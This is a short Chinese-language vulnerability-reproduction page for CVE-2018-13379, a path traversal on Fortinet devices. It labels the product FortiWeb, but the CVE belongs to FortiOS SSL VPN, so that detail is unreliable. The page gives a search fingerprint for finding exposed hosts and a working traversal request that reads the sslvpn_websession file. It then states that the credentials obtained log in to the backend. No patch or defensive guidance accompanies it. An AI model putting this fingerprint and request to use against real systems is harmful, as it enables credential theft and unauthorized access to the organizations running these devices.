Fortinet FortiWeb sslvpn_websession 路径遍历漏洞 CVE-2018-13379

漏洞描述

Fortinet FortiWeb路径遍历漏洞，攻击者通过漏洞可以获取缓存信息，登录服务器

漏洞影响

Fortinet FortiWeb

网络测绘

body="FortiToken clock drift detected"

漏洞复现

登录页面

验证POC

/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession

获取的账号密码即可登录后台